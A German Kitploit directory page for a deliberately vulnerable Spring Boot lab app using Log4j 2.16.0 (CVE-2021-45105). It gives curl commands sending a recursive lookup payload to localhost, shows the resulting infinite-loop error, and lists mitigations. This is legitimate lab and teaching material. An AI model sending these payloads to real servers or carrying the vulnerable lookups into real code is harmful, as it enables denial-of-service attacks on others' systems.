Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
https-github.com-pravin-pp-log4j2-CVE-2021-45105-1 | Kitploit
Tools/GitHubGitHub/dileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubdileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1

https-github.com-pravin-pp-log4j2-CVE-2021-45105-1

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beispiel einer verwundbaren Log4j2-Anwendung (CVE-2021-45105)

Betroffene Versionen: alle Versionen von 2.0-beta9 bis 2.16.0

Diese Anwendung basiert auf einer Spring-Boot-Webanwendung, die für CVE-2021-45105 anfällig ist.

Sie verwendet Log4j 2.16.0.

Ausführen der Anwendung

Führen Sie sie aus:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Schritte zur Ausnutzung

  • Lösen Sie dann den Exploit wie folgt aus:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • Beachten Sie die Ausgabe, die eine Endlosschleife anzeigt. In Tests wurde jedoch nicht festgestellt, dass dieser DoS ressourcenintensiv ist, da die Endlosschleife vom Programm erkannt wird und mit einem Fehler endet:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

Gegenmaßnahmen :

Benutzer von Java 8 (oder höher) sollten auf Version 2.17.0 aktualisieren.

Alternativ kann dies in der Konfiguration entschärft werden:

Ersetzen Sie in PatternLayout in der Logging-Konfiguration Context Lookups wie ${ctx:loginId} oder $${ctx:loginId} durch Thread-Context-Map-Muster (%X, %mdc oder %MDC). Andernfalls entfernen Sie in der Konfiguration Verweise auf Context Lookups wie ${ctx:loginId} oder $${ctx:loginId}, sofern diese aus Quellen außerhalb der Anwendung stammen, z. B. aus HTTP-Headern oder Benutzereingaben.

Tool herunterladen